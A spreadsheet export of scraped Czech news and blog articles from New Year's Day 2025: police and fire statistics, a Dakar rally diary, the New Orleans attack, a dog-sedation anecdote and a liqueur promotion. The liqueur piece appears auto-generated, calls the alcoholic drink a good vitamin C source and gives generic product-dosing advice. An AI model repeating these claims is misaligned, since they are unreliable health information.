ZÁKAZ UŽÍVÁNÍ ZDE ZVEŘEJNĚNÝCH MATERIÁLŮ. PROVOZOVATELEM SERVERU JE BC. MONIKA JAŇURKOVÁ, SE SÍDLEM VĚSTONICKÁ 432/2, 15521, PRAHA - ZLIČÍN. IČ 04518900 ZAPSANÁ V ŽIVNOSTENSKÉM REJSTŘÍKU. NEJEDNÁ SE O OFICIÁLNÍ STRÁNKU POLICIE ČESKÉ REPUBLIKY . Autor: Karolína Macháčková Autor person Karolína Macháčková</t>
  </si>
  <si>
    <t>20250101_144_3696110035_967e8a6c9bf27d1bc162.html</t>
  </si>
  <si>
    <t>967e8a6c9bf27d1bc162</t>
  </si>
  <si>
    <t>Silvestrovské oslavy byly z pohledu středočeských policistů srovnatelné s těmi loňskými</t>
  </si>
  <si>
    <t>Silvestrovské oslavy byly z pohledu středočeských policistů srovnatelné s těmi loňskými Foto: HZS SČK Středočeský kraj Na poslední den v roce, který bývá z pohledu oznámených událostí většinou velmi exponovaný, dohlížely ve Středočeském kraje vyšší počty policistů a hlídek, které byly v terénu a mohly tak okamžitě reagovat na nahlášená oznámení. Za celý silvestrovský den, tedy až do půlnoci, kontaktovali občané policisty na lince tísňového volání s 285 telefonáty (vloni cca 300). Od půlnoci do šesté hodiny ráno pak přijali policisté sloužící na lince 158 celkem 150 oznámení (vloni 160). A čeho se nejvíce oznámení týkala? Lidé oznamovali hořící popelnice, koše, hořící krabice od pyrotechniky, stěžovali si ale i na hluk od petard. Každoročně dochází k různým potyčkám a napadením, většinou podpořena předešlou konzumací alkoholu a nejinak tomu bylo i letos. Policisté přijímali oznámení o hádkách, fyzických napadeních, někteří se zraněními skončili i v nemocnici. Tyto případy již policisté řeší v trestně-právní rovině, kdy prověřují „aktivitu“ jednotlivých účastníků těchto incidentů, u kterých též nechyběl alkohol . Méně bylo ale dopravních nehod, od silvestrovského rána do půlnoci přijali operační důstojníci 56 oznámení dopravních nehodách, po půlnoci do sedmé ráno pak pouze sedm. Jedna z nich se stala patnáct minut již v roce 2025 u v blízkosti železničního přejezdu u Rohatska na Mladoboleslavsku , kdy dívka r. 2004 zřejmě dostala při řízení smyk a havarovala s vozidlem, ve kterém seděly další osoby, do příkopu před železničním přejezdem. Dívka za volantem nadýchala něco málo přes desetinu promile. Jednou z prvních událostí byl pak nahlášen skok 33letého muže z druhého patra domu na Příbramsku . Byl převezen do nemocnice a policisté zjišťují, co ho k takovému činu vedlo. Na linku 158 přijímali policisté i spoustu oznámení, tedy spíše zbytečných a někdy až obtěžujících. Například od opilců, kteří měli potřebu policistům vulgárně a dost nevybíravě nadávat. Oproti tomu volali i ti, kteří jim za jejich práci děkovali, nebo se jim svěřovali se svými problémy a starostmi. Všechna tato volání policisté rychle ukončovali, aby tísňová linka nebyla blokována pro oznámení jakékoliv „tísně“. Z pohledu policistů, kteří dvacet čtyři hodin sloužili na lince 158, nebyl tedy poslední den roku 2024 nijak vybočující či významně jiný, než ten loňský. A to jak z pohledu počtu oznámených událostí, tak jejich obsahu. Nicméně neřešili žádnou dramatickou událost či kolizi, která by někoho stála život. O některých událostech a incidentech budeme konkrétněji informovat hned první dny nového roku. Pohledem středočeských hasičů (kpt. Ing. Tomáš Bakalář) V úterý 31. prosince museli hasiči zasahovat u 66 mimořádných událostí, což je podle statistiky HZS Středočeského kraje nadprůměrný počet za den. Profesionální jednotky požární ochrany ve spolupráci s podnikovými a dobrovolnými sbory vyjížděly celkem k třiceti požárům, z toho šestnáct souviselo se silvestrovskou zábavou. Největší nárůst těchto požárů evidujeme mezi patnáctou a šestnáctou hodinou a následně od dvaceti hodin do půlnoci. Patří k nim i pět větších požárů. První z nich byl ohlášen krátce po dvacáté hodině z rekreační oblasti Svárov u Poříčí nad Sázavou , kde došlo k požáru chaty. Plameny napáchaly škodu za pět set tisíc korun a hasebním zásahem se podařilo uchránit hodnoty ve výši dvou milionů korun. Proč začalo hořet, zjišťují vyšetřovatelé. Druhým požárem byl těsně před 21. hodinou požár bytu v Brandýse nad Labem , při kterém jsme předali jednu popálenou osobu do péče zdravotnických záchranářů. Škoda byla vyčíslena na osm set tisíc korun. I v tomto případě je příčina ve stádiu vyšetřování. Skoro ve stejném čase jsme zaznamenali požár drážního domku v katastru obce Kamenné Žehrovice na Kladensku, u kterého zasahovala i jednotka Správy železnic Kralupy nad Vltavou . Příčinu, škody a uchráněné hodnoty oznámí vyšetřovatelé po vyhodnocení získaných poznatků. V půl jedenácté večer pak hasiči likvidovali požár maringotky na okraji obce Ješín na Kladensku a podařilo se jim uchránit majetek ve výši jednoho milionu korun. Příčinou vzniku požáru bylo vznícení hořlavého materiálu od spalinové cesty. Posledním a zároveň nejzávažnějším požárem loňského roku byl požár bytu ve čtvrtém nadzemním podlaží panelového domu u nemocnice v Příbrami . Ze zakouřeného hořícího bytu hasiči vynesli jednu nadýchanou osobu, kterou následně předali do péče posádce zdravotnické záchranné služby . Škoda byla vyčíslena na pět set tisíc korun, včasným zásahem a nasazením potřebného počtu sil se však příbramským profesionálním hasičům s dobrovolnými kolegy z Bohutína , Březových Hor a Trhových Dušníků podařilo uchránit hodnoty za dvacet milionů korun. Příčina se stále vyšetřuje. Mezi půlnocí a osmou hodinnou ranní přibylo dalších 40 mimořádných událostí, ke kterým museli hasiči vyjíždět. Z toho bylo třicet dva požárů a většina z nich souvisela s oslavami příchodu nového roku. Sedmnáct minut po třetí hodině ranní přijalo Krajské operační a informační středisko HZS Středočeského kraje informaci o požáru odpadu v obci Líbeznice v okrese Praha -východ. Po příjezdu první jednotky a rychlém průzkumu bylo upřesněno, že jde požár přístřešku a zahradní techniky. Oheň napáchal škodu za pět set tisíc korun, ve stejné výši se podařilo uchránit hodnoty hasebním zásahem. Příčina je v šetření. Po čtvrté hodině ranní vyjely profesionální a dobrovolné jednotky likvidovat požár domečku na dopravním hřišti v Mnichově Hradišti na Mladoboleslavsku . Škody napáchané požárem byly stanoveny na dva miliony korun, také příčina tohoto požáru se vyšetřuje. Tři minuty před osmou hodinnou ranní byl ohlášen požár půdního prostoru rodinného domu v obci Ledce v okrese Mladá Boleslav . Plameny se podařilo dostat pod kontrolu krátce po deváté hodině. Škoda byla stanovena na jeden a půl milionu korun, uchráněné hodnoty na pět milionů. Příčinou vzniku požáru byla technická závada u komínového tělesa. Příchod nového roku byl pro hasiče ze Středočeského kraje náročnější než ten předchozí o 32 mimořádných událostí, což je nárůst o 46 procent. mjr. Mgr. Vlasta Suchánková Policie ČR Foto: HZS SČK Pátrání po osobách Pátrání po vozidlech Nábor k Policii ČR Nábor k Celní správě ČR Nábor k Vězenské službě ČR COPYRIGHT © 2025 TÝDENÍK POLICIE. BEZ PÍSEMNÉHO SOUHLASU REDAKCE JE PŘÍSNÝ ZÁKAZ UŽÍVÁNÍ ZDE ZVEŘEJNĚNÝCH MATERIÁLŮ. PROVOZOVATELEM SERVERU JE BC. MONIKA JAŇURKOVÁ, SE SÍDLEM VĚSTONICKÁ 432/2, 15521, PRAHA - ZLIČÍN. IČ 04518900 ZAPSANÁ V ŽIVNOSTENSKÉM REJSTŘÍKU. NEJEDNÁ SE O OFICIÁLNÍ STRÁNKU POLICIE ČESKÉ REPUBLIKY . Autor: Vlasta Suchánková Autor person Vlasta Suchánková</t>
  </si>
  <si>
    <t>20250101_145_3696067227_5e90e1f0c39f6ad92b1b.html</t>
  </si>
  <si>
    <t>5e90e1f0c39f6ad92b1b</t>
  </si>
  <si>
    <t>Bezdomovci na Václavském náměstí mají novou kratochvíli. Češi nevěří vlastním očím</t>
  </si>
  <si>
    <t>Bezdomovci na Václavském náměstí mají novou kratochvíli. Češi nevěří vlastním očím Ocitnout se bez domova není nic záviděníhodného, a to obzvlášť v této době, která je naplněna emocemi, ale také je lemována velmi nízkými teplotami. Nelze se tedy divit tomu, že se tito lidé snaží si nějakým způsobem přilepšit. Nějaké peníze potřebují Pravdou také je, že jsou v tomto ohledu velmi kreativní. Klasické žebrání dnes již moc nejede, protože jsou vůči němu potenciální přispěvatelé velmi imunní. “ Nechápu, proč bych jim měla něco dávat. Vždyť dnes může jít pracovat úplně každý, tak ať si vydělají. Aby si za ty peníze koupili chlast , to opravdu podporovat nebudu, ” říká paní Anežka, když míjí několik podobných individuí na Václavském náměstí . Proto by vás nemělo překvapit, že si potřební obstarávají peníze jinak. Čechy to však pobuřuje. “Před chvílí tady byl výtečník, který vytahoval peníze z kašny. Normálně tam vlezl a spoustu toho vysbíral. Myslím, že to bylo aspoň několik stovek,” říká paní Klára, která byla svědkem vybírání fontány před Národním muzeem . “ To se tu děje úplně běžně. Město z té fontány nemá ani korunu, protože to do poslední mince vyberou bezdomovci, ” osvětlil pro server Mix24.cz pracovník ostrahy Národního muzea , před kterým se tato fontána nachází. Smí se to dělat? Jde přitom o zajímavou památku, u které se turisté zastavují, aby tam hodili nějakou tu minci. Často jde o dvoukoruny či pětikoruny, ale výjimkou nejsou ani dvacetikoruny nebo 50koruny. To už jsou potom velmi zajímavé úlovky. Čtěte také: Za pár dní končí v Česku důležité platidlo. Kdo se ho rychle nezbaví, prodělá peníze. Lidé už plaší Je přitom zajímavé, že to nikdo příliš neřeší, přestože legislativně jde o velmi rozporuplnou činnost. Nejde totiž o peníze všech, jak by se někteří mohli domnívat, ale vhozením se stávají majetkem města. Jejich zcizení je tedy problematické. Foto: Shutterstock, zdroje: pražské kašny a fontány, Národní muzeum Continue Reading</t>
  </si>
  <si>
    <t>20250101_146_3696064911_0617d5608649f324a96f.html</t>
  </si>
  <si>
    <t>0617d5608649f324a96f</t>
  </si>
  <si>
    <t>Jak jsem dala psovi prášky na uklidnění aneb můj báječný Silvestr</t>
  </si>
  <si>
    <t>Jak jsem dala psovi prášky na uklidnění aneb můj báječný Silvestr Silvestr pro mě už mnoho let nepředstavuje žádný důvod k bujarým oslavám, přesto se na něj každý rok těším. Vlastní společnost je mi bůhví proč v tento den dražší než jindy. Návštěvy už dávno nezvu, z domu vycházím naposledy před setměním na krátkou procházku se psem, abychom to stihli dřív, než to všude kolem začne práskat, a pak už se věnuji jenom sama sobě a reflexím, které si nemůžu odpustit. Nesnáším všelijaké motivační fráze a rádoby moudré věty poletující internetem, které na mě vykukují kamkoli se podívám. Třeba tu, která na mě onehdy odkudsi vyběhla, a kterou údajně pronesl Walt Disney : „Všechny naše sny se mohou splnit, pokud máme odvahu si je splnit.“ Což o to, odvahy já mám kopec. A nebo tu kontroverzní, kterou jsme všichni slyšeli asi tisíckrát a nevím, že by někomu život nějak výrazně zkvalitnila: „Radši budu litovat věcí, které jsem udělal, než litovat toho, co jsem neudělal.“ No řekněte, takový alibistický nesmysl, který neznamená nic jiného než odhalení vlastní neschopnosti. Když už něčeho musím litovat, pak jsem to asi udělal špatně. O motivačních frázích a mém často až škodolibém přístupu k nim ale psát nechci, možná si to schovám na jiný článek. Ale důvod, proč je právě v souvislosti se svým pojetím novoročních oslav zmiňuji, existuje. Já si totiž sama pro sebe, daleko od jásacího davu, bilancuji. Tohohle zvyku, i když i mě samotné se zdá být dost patetický, se prostě nemůžu zbavit. Přijde Silvestr a já prostě bilancuju. Ne že bych sama sobě předkládala nějaké účty nebo si dělala soupis toho, co se mi povedlo nebo co bych mohla příští rok zlepšit, jako bych sama před sebou klečela na koberečku, to zase ne. Zkrátka se za tím uplynulým rokem jen tak v soukromí ohlédnu, vzpomenu na důležité milníky a představuju si, co dalšího mě asi čeká. Bez sebelítosti, zmaru nebo velkých plánů. Z loňského roku si ale určitě budu pamatovat poslední den. Jestli teď někomu připadám jako osoba, která se vyžívá v „ mindfulness “ nebo meditacích, tak to vážně ne. K internímu prožitku si i v osamění dopomáhám klasickými prostředky. Naleju si skleničku vína a chlebíčky obložím lososem, aby ta moje dobrovolná samota měla slavnostní nádech. I letos tomu mělo být nejinak. Jak už ale asi tušíte, můj pečlivě naplánovaný a vcelku jednoduchý program se zvrtl. Chlebíček s oschlým lososem jsem si dala k snídani a otevřenou láhev zase zašpuntovala. Skleničku si dám až v poledne k čočce. Mí věrní sledující vědí, že mám psa. Pro ty ostatní doplním, že fenka se jmenuje Belinda, je z rodu neušlechtilého a příští měsíc oslaví dva roky. Belinda je všechno, jenom ne vyrovnaný pes. A ona je tím důvodem, proč mé báječné silvestrovské plány naprosto selhaly. Víte, já moc nedám na prášky a polykám je až když už není zbytí. Ibuprofen mám v šuplíku pro případ největší krize, antibiotika jsem brala naposledy před mnoha lety a uklidňující léky a antidepresiva nahrazuju skleničkou vína . Ani netuším, jak se to všechno jmenuje. Takže asi chápete, že ani psovi nic nestrkám, pokud není zbytí. V případě Belindy ale zbytí už vážně nebylo. Jestli může nevinný prášek předejít stavům paniky, které jsou v podání Belindy skutečně nevídané, pak to má smysl, řekla jsem si, a poprvé v životě se na ohňostroje a petardy jako moderní žena předem vyzbrojila u veterináře. Těšila jsem se na klidný večer s rozjímáním, sklenkou vína a lososem až do půlnoci, kdy mi jako každý rok nezapomene zavolat syn, a pak se půjdu na ten nový rok vyspat do růžova. Báječný plán. Kdyby vyšel. Panický stav se totiž dostavil, ale naprosto jinak, než bych předpokládala. Víte, já lékaře ani farmaceuty sice nevyhledávám, ale chovám k nim úctu a v mých očích požívají až nekritické důvěry. Oni totiž vědí to, o čem já nemám ani tuchy. A to platí i v případě veterinářů. Můj veterinář Belindu zná a ví, že i pouhé otočení psa na záda představuje akrobatický výkon minimálně dvou lidí a vzpínající se a bojující tělo vážící téměř 30 kilo nelze jinak než zalehnout. Do malé papírové krabičky mi odsypal pilulky a pro případ, že bych si to nepamatovala, na ni napsal instrukce: 2.5 tablety 3 hodiny předem. Pilule jsou prý bezpečné a něčeho jako je projev opilosti se rozhodně obávat nemusím. Jenom prý bude klidnější. Jak už jsem řekla, má důvěra v bílé pláště je bezmezná. Abych to upřesnila. Byla bezmezná. Na účinek jsem si tři hodiny počkat nemusela. Ani ne hodinu poté začala být Belinda divná. Zmatená a dezorientovaná. Po každých třech bezcílných krocích si lehla na zem, a dokonce i vstát jí dělalo potíže. Po schodech nahoru do ložnice, což je její bezpečný přístav, dvakrát upadla a na postel jsem jí musela pomoct. Do stavu paniky jsem se tak dostala já. Žádné valium, nebo jak se to jmenuje, doma nemám, abych si i já mohla něčeho na uklidnění lupnout, a z mého poklidného večera se stal děs. Žádná reflexe uplynulého roku ani slibné myšlenky na rok příští, jenom strach. A ozvěna té pitomé motivační fráze, která se v převráceném smyslu zdála být smysluplnější: „Radši bych litovala věcí, které jsem neudělala než litovat toho, co jsem právě udělala.“ Možná jsem zabila vlastního psa. Nebojte se, nezabila. Jenom jsem strávila večer, který začal tak slibně, surfováním na internetu, hledáním onoho prášku, jeho vedlejších účinků a doporučeného dávkování. A pro případ nouze se vyzbrojila telefonními čísly na veterinární pohotovost. Zjistila jsem, že můj pan veterinář nejenže dal Belindě plnou palbu, ale ještě trochu přidal, takže jsem jí zkrátka a dobře předávkovala. To mám za to, že jsem důvěřivá. Z mé silvestrovské noci nebylo nic. V 10 večer jsem si lehla vedle mrtvolné Belindy, abych mohla kontrolovat, že aspoň dýchá, když už nemohla ani zvednout hlavu k nabízené šunčičce. Přemožena černými myšlenkami a špatným svědomím jsem vedle ní usnula a zaspala ohňostroje i novoroční telefonát od syna. Belinda po dvanácti hodinách konečně opatrně vstala a odšourala se před dům vyčůrat. Vypadá tak klidně, jak jsem si to celé na začátku představovala. Můžeme tedy vyjít na procházku do novoročních ulic a reflexi si nechám až na příští rok. Stejně není o čem přemýšlet, protože tenhle rok bude zaručeně lepší. Zcela jistě jeho závěr, protože už mám plán. Buď vyměním a předem vyzkouším pilule nebo s Belindou odjedu někam do hlubokých lesů, kam ozvěny ohňostrojů a petard nedoléhají. Přeji všem krásný a poklidný rok 2025 bez antidepresiv a motivačních frází. Snad kromě jedné. Důvěřuj, ale prověřuj!</t>
  </si>
  <si>
    <t>20250101_147_3696086159_abd78381b5bc1284c5bc.html</t>
  </si>
  <si>
    <t>abd78381b5bc1284c5bc</t>
  </si>
  <si>
    <t>Shrnutí Bezdomovci na Václavském náměstí mají novou kratochvíli. Češi nevěří vlastním očím Ocitnout se bez domova není nic záviděníhodného, a to obzvlášť v této době, která je naplněna emocemi, ale také je lemována velmi nízkými teplotami. Nelze se tedy divit tomu, že se tito lidé snaží si nějakým způsobem přilepšit. Nějaké peníze potřebují Pravdou také je, že jsou v tomto ohledu velmi kreativní. Klasické žebrání dnes již moc nejede, protože jsou vůči němu potenciální přispěvatelé velmi imunní. “ Nechápu, proč bych jim měla něco dávat. Vždyť dnes může jít pracovat úplně každý, tak ať si vydělají. Aby si za ty peníze koupili chlast , to opravdu podporovat nebudu, ” říká paní Anežka, když míjí několik podobných individuí na Václavském náměstí . Proto by vás nemělo překvapit, že si potřební obstarávají peníze jinak. Čechy to však pobuřuje. “Před chvílí tady byl výtečník, který vytahoval peníze z kašny. Normálně tam vlezl a spoustu toho vysbíral. Myslím, že to bylo aspoň několik stovek,” říká paní Klára, která byla svědkem vybírání fontány před Národním muzeem . “ To se tu děje úplně běžně. Město z té fontány nemá ani korunu, protože to do poslední mince vyberou bezdomovci, ” osvětlil pro server Mix24.cz pracovník ostrahy Národního muzea , před kterým se tato fontána nachází. Smí se to dělat? Jde přitom o zajímavou památku, u které se turisté zastavují, aby tam hodili nějakou tu minci. Často jde o dvoukoruny či pětikoruny, ale výjimkou nejsou ani dvacetikoruny nebo 50koruny. To už jsou potom velmi zajímavé úlovky. Čtěte také: Za pár dní končí v Česku důležité platidlo. Kdo se ho rychle nezbaví, prodělá peníze. Lidé už plaší Je přitom zajímavé, že to nikdo příliš neřeší, přestože legislativně jde o velmi rozporuplnou činnost. Nejde totiž o peníze všech, jak by se někteří mohli domnívat, ale vhozením se stávají majetkem města. Jejich zcizení je tedy problematické. Foto: Shutterstock , zdroje: pražské kašny a fontány , Národní muzeum Continue Reading Autor: Aleš Kulhánek Autor person Aleš Kulhánek</t>
  </si>
  <si>
    <t>28760</t>
  </si>
  <si>
    <t>35810</t>
  </si>
  <si>
    <t>20250101_148_3696067235_ac680d7bd911bec83ece.html</t>
  </si>
  <si>
    <t>ac680d7bd911bec83ece</t>
  </si>
  <si>
    <t>Češi už jsou na startu Rally Dakar 2025.&amp;nbsp;Většina z&amp;nbsp;nich letěla charterem, letadlo pak budou využívat organizátoři</t>
  </si>
  <si>
    <t>Češi už jsou na startu Rally Dakar 2025.&amp;nbsp;Většina z&amp;nbsp;nich letěla charterem, letadlo pak budou využívat organizátoři Rally Auto roku Formule 1 Legendy 2024 Drobečková navigace Garáž.cz Události Rally Dakar Češi už jsou na startu Rally Dakar 2025. Většina z nich letěla charterem, letadlo pak budou využívat organizátoři Hlavní obsah Češi už jsou na startu Rally Dakar 2025. Většina z nich letěla charterem, letadlo pak budou využívat organizátoři Foto: Jan Červenka Tým Orlen Jipocar veze Shreka schovaného v malém kamionu. Ten se pak pro zbytek Dakaru změní v pojízdnou kuchyň a noclehárnu. A o Shrekovi až příště, v samostatném článku. Jan Červenka 1. 1. 2025, 14:00 Češi na Dakaru doslova létají! Jejich stroje patří k těm rychlým a respektovaným a bez Čechů by Dakar nebyl Dakarem . Organizátoři opět budou využívat i český boeing. Všechno pivo na palubě musí být zapečetěno. A posádka si veze i náhradní pneumatiky… Článek Obrovské asfaltové parkoviště u přístavu v Džiddě je aktuálně tím nejlepším místem, kde začít psát dakarský deník. Ono tady totiž žádné jiné vhodné místo ani není. Už jsem tady pošesté. Tedy ne na tomhle konkrétním parkovišti, ale na Rally Dakar v Saúdské Arábii (ještě rok předtím jsem si zkusil i Dakar v Africe , to abych si udělal obrázek a měl možnost srovnání). A pořád se těším, jako kdyby to bylo poprvé. Foto: Jan Červenka Převzít techniku, vyřídit akreditace, koupit místní SIM karty… Na Dakaru je to jako na vojně – buď se na něco čeká, nebo se nestíhá. Ten začátek bývá tradičně nejnáročnější. Všude kolem je to velká barevná směs triček. Jednotlivé týmy se sjíždí právě sem, aby si vyzvedly svoje stroje. Auta, motorky, kamiony, buginy. A také doprovodné kamiony, obytňáky, více či méně upravené pick-upy a terénní auta. Závodníci z celého světa, Čechů je tady ale požehnaně. Vloni jsme byli čtvrtou nejsilnější národností na Dakaru a letos je to, tuším, stejně. Fakt se těším. A také jsem fakt unavený. Na Dakar za obhajobou: Martin Macík má nový kamion na nových pneumatikách a spoustu odhodlání k tomu Přitom většina Čechů přiletěla charterovým letem přímo z Prahy . Stejně jako vloni, předloni a i rok předtím. Nejlepší a nejrychlejší způsob, jak se sem dostat. Boeing 737 společnosti Smartwings, se kterým jste dost možná letěli v létě někam na dovolenou, v kokpitu mimo jiné kapitán Jan Šťastný , nechybí ani šéf kabiny Jan Vácha. Oba dva znám, světe, div se, z předešlých ročníků. Před pár dny přepravovali bandu polárníků z Norska do Antarktidy , teď budou tři týdny tady s námi v Saúdské Arábii , když budou létat pro pořadatele. Jedno letadlo, deset členů posádky. Foto: Jan Červenka Když si v Saúdské Arábii objednáte taxíka, nově pro vás může přijet i žena. Tohle byla vskutku zajímavá zkušenost… „Jsme tady tři piloti, pět členů palubního personálu a dva mechanici,“ vypočítává Jan Šťastný. „Ale vás je nějak málo, ne? Jen 115 lidí.“ Charterem letěly týmy Martina Prokopa , Martina Macíka a Buggyry, v tom mumraji se nedaly přehlédnout barevné vlasy Báry Holické a Lucky Engeové, které startují v kategorii Dakar Classic, nechybělo ještě pár dalších. Zbytek účastníků přiletěl do Saúdské Arábie běžnými linkami. „Dohromady máte 117 zavazadel o celkové váze 2 221 kilogramů,“ směje se Šťastný, když kouká do papírů. „A je zařízeno, že na palubě je i pivo , což při letech do Saúdské Arábie , kde vládne přísný zákaz alkoholu , rozhodně nebývá zvykem.“ A pak dodává, že po příletu musí veškerý alkohol zapečetit, včetně prázdných plechovek. „Jedna plechovka zapomenutá někde v letadle, rovná se pokuta tisíc rijálů. Dvě plechovky, dva tisíce…“ doplňuje Vácha. Trasa Praha - Džidda byla dlouhá 2 233 námořních mil, což je 4 135 kilometrů. Zvládli jsme ji za necelých pět hodin a spálili jsme přitom 12 462 kg paliva. „Standardní let, nic extra. Ty zajímavější věci teprve přijdou,“ usmívá se Šťastný. Ani on není na Dakar Rally nováčkem, a tak mi vypráví, jak vloni přistávali na letišti v Shubaytah, které ještě před pár lety patřilo ropné společnosti Aramco . „Letos nás to čeká zas. Je to trochu divočina, není to standardní letiště s řízením letového provozu, takže se jede podle jiných postupů. A když se tam cokoliv stane, tak je problém, protože se nikam nedovoláte. Není tam signál na mobil a ani záložní systém, který se používá na běžných komerčních letištích. Možná pevná linka, ale raději na to ani nemyslet.“ Foto: A.S.O. Pořadatelé využívají nejen český boeing, ale i třináct vrtulníků a několik menších vrtulových letadel. Každopádně na všelijaké situace je posádka Smartwings připravená a i samotné letadlo prošlo před třítýdenním výletem do Saúdské Arábie pečlivou přípravou. „Brzdy jsou v polovině životnosti, klidně snesou ještě čtyři měsíce čilého provozu. Měnila se pneumatika na jednom z podvozků, pro jistotu s sebou vezeme další dvě pro případ defektu, zrovna vloni jsme tady jeden měli. No, a samozřejmostí je i hever, olejové a hydraulické náplně, prostě máme všechny ty věci, které zvládneme opravit na místě svépomocí. Dohromady 840 kg náhradních dílů a nářadí.“ Poslední ostrý test před Dakarem : Macík s přehledem vítězí, Prokop šlape na paty těm nejrychlejším Kromě toho si ale také každý z nich veze spacák a karimatku. „Většinou spíme někde na hotelu, ale minulý rok v Pusté končině žádný hotel prostě nebyl a organizátoři nám museli půjčovat svoje vybavení,“ směje se Šťastný. „Stany jsme si ale nebrali, snad nám dovolí přespat v letadle.“ Boeing 737 společnosti Smartwings teď bude sloužit organizátorům a členové posádky si jistě nenechají ujít příležitost zafandit si přímo u trati. Co doprovodné týmy budou jezdit po ose, to oni zvládnou vzduchem - kromě pořadatelů vozí třeba i VIP návštěvníky. Do Česka se letadlo i s početnou českou skupinou vrátí 19. ledna večer. Snad v něm bude i nějaký ten zlatý beduín pro nejlepší jezdce svých kategorií. A jinak? Po menším chaosu v přístavu nás všechny čekalo přes 500 kilometrů do Bishy, kde je velký bivak a kde se pojede i prolog. Bylo to cestou necestou, jeli jsme sem osm hodin, a to jsme netušili, že další dvě hodiny strávíme čekáním v koloně, než se dostaneme na akreditaci. Před osmadvaceti hodinami jsme se potkali v Praze , matně si vzpomínám, že jsem dvě hodiny spal. Ano, tohle je důstojný začátek Dakaru . Teď sprcha, konečně si vyčistit zuby, tři hodiny spánku a zítra se jede na test. Jo, a už jsem si pořádně prohlédl dacii a nového Shreka. Myslím, že se máme na co těšit! Díky, že v tom letíte… tedy jedete s námi! Diskuze Autor: Jan Červenka Autor person Jan Červenka</t>
  </si>
  <si>
    <t>20250101_149_3703127649_b98bb75c147167762636.html</t>
  </si>
  <si>
    <t>b98bb75c147167762636</t>
  </si>
  <si>
    <t>Policie v New Orleans potvrdila 10 obětí a nejmíň 35 zraněných po útoku na Bourbon street. Řidič pick (video)</t>
  </si>
  <si>
    <t>Policie v New Orleans potvrdila 10 obětí a nejmíň 35 zraněných po útoku na Bourbon street. Řidič pick (video) Policie v New Orleans potvrdila 10 obětí a nejmíň 35 zraněných po útoku na Bourbon street. Řidič pick-upu tam ve velké rychlosti vjel do davu lidí slavících příchod nového roku . Mezi zraněnými jsou i dva policisté, kteří na místě zasahovali. Na tiskové konferenci vyšetřovatelé uvedli, že muž jednal úmyslně. Policie ho zatím nedopadla, guvernér státu Louisana vyzval, aby se občané místu vyhnuli. 🟡 Starostka města LaToya Cantrellová na tiskové konferenci čin označila za ,,teroristický útok", nicméně dodala, že stále probíhá vyšetřování. Anne Kirkpatricková z neworleanské policie označila jednání za úmyslné. Podle ní se muž snažil přejet co nejvíce lidí. Dodala, že nebyl pod vlivem alkoholu a že postřelil dva policisty. Jejich zdravotní stav je stabilizovaný. 🔗 Více v článku: https ://czch.tv/fPFWEU New Orleans po útoku Autor: Ceskatelevize.cz | (ČT) || Kurzy.cz</t>
  </si>
  <si>
    <t>165700</t>
  </si>
  <si>
    <t>20250101_15_3698137170_a9af34e72a942a84fa41.html</t>
  </si>
  <si>
    <t>a9af34e72a942a84fa41</t>
  </si>
  <si>
    <t>Co to je Aperitivo Bitter San Fabio? Představení nápoje ,</t>
  </si>
  <si>
    <t>Co to je Aperitivo Bitter San Fabio? Představení nápoje , Tesla Co to je Aperitivo Bitter San Fabio? Představení nápoje, Autor: Driveway 1 ledna, 2025 Víte, co je ta oživující chuť italského nápoje Aperitivo Bitter San Fabio? Pokud jste zvědaví na nové trendy v oblasti alkoholických nápojů, pak jste na správném místě! V tomto článku vám představíme jedinečný a osvěžující Aperitivo Bitter San Fabio, který vás okouzlí svou kombinací bylin a citrusů. Ponořte se s námi do světa tohoto lahodného nápoje a objevte jeho tajemství. Obsah 5.1 Nenechte si ujít: Jaké je složení Aperitivo Bitter San Fabio? Složení Aperitivo Bitter San Fabio Aperitivo Bitter San Fabio je jedinečným míchaným nápojem, který v sobě kombinuje širokou škálu vybraných bylin a přísad. Tento tradiční italský aperitiv je pečlivě vyráběn z kvalitních surovin, aby zaručil autentickou chuť a osvěžující zážitek pro svého konzumenta. Mezi hlavní složky Aperitivo Bitter San Fabio patří: Pelyněk: Dodává nápoji horkou hořkosladkou chuť a jemnou aromatickou vůni. Je oblíbený pro své příznivé účinky na trávení a podporu dobrého trávicího systému. Chinotto pomeranč: Přidává do nápoje lehkou a osvěžující hořkost, která je typická pro italské aperitivy. Tento specifický druh pomeranče pochází z Ligurie a je ceněný pro svou výraznou chuť a aroma. Třezalka tečkovaná: Tato bylina dodává Aperitivo Bitter San Fabio unikátní komplexnost a mírně bylinný charakter. Má pověst jako přírodní prostředek ke zklidnění a podporu pohody. Dalšími důležitými ingrediencemi jsou aromatické koření, které nápoji dodává bohatou a vyváženou chuťovou paletu. Přesný poměr jednotlivých složek je pečlivě střežený tajemství výroby, které přidává Aperitivo Bitter San Fabio jeho jedinečnost a nezaměnitelnost. Proč se Aperitivo Bitter San Fabio stává oblíbeným nápojem? Proč je Aperitivo Bitter San Fabio tak oblíbeným nápojem? Důvodů je hned několik. Zaprvé, tento výjimečný nápoj je vyroben z kvalitních a pečlivě vybraných ingrediencí, což mu přidává na dokonalosti v chuti. Jeho hřejivou esencí je tradiční kořeněný alkohol , který je v kombinaci s bylinnými extrakty a citrusy opravdu neodolatelný. Kromě vynikající chuti je také perfektním zdrojem vitamínu C, který přispívá k celkovému zdraví a vitalitě. Druhým důvodem oblíbenosti Aperitivo Bitter San Fabio je jeho všestrannost. Tento nápoj můžete pít čistý nebo jej můžete použít jako základ pro přípravu různých koktejlů a míchaných nápojů. Skvěle se hodí také jako ingredience pro tvorbu osvěžujících letních drinků. Pestrá škála možností vám umožní vytvořit si vlastní oblíbenou kombinaci chutí. Jak ho užívat? Recepty a doporučení Tak jste se rozhodli vyzkoušet náš produkt? Skvělá volba! A teď se ptáte, jak ho správně užívat? Nemusíte se bát, máme pro vás připraveny skvělé recepty a doporučení, která vám pomohou využít maximálně potenciál našeho produktu. Především je důležité říct, že náš produkt je vysoce kvalitní a vysoce účinný. Je navržen tak, aby dosahoval nejlepších výsledků a přinesl vám požadované efekty. Pokud ho správně využijete, můžete si být jisti, že dosáhnete svých cílů. A teď k těm receptům a doporučením. Zde je několik tipů, jak náš produkt efektivněji využít: Začněte s malými dávkami a postupně je zvyšujte, abyste si zvykli na účinky. Dodržujte pravidelné užívání podle našeho doporučení, výsledky se dostaví nejrychleji při pravidelném užívání. Vhodně kombinujte s jinými produkty z naší řady, abyste získali optimální výsledky. Dbejte na správnou stravu a pravidelný pohyb, aby se účinky našeho produktu projevily v plné síle. Kombinace zdravého životního stylu s naším produktem je klíčem k úspěchu. Nyní víte, jak náš produkt správně užívat a jak ho co nejlépe využít. Je na vás, abyste se chopili této 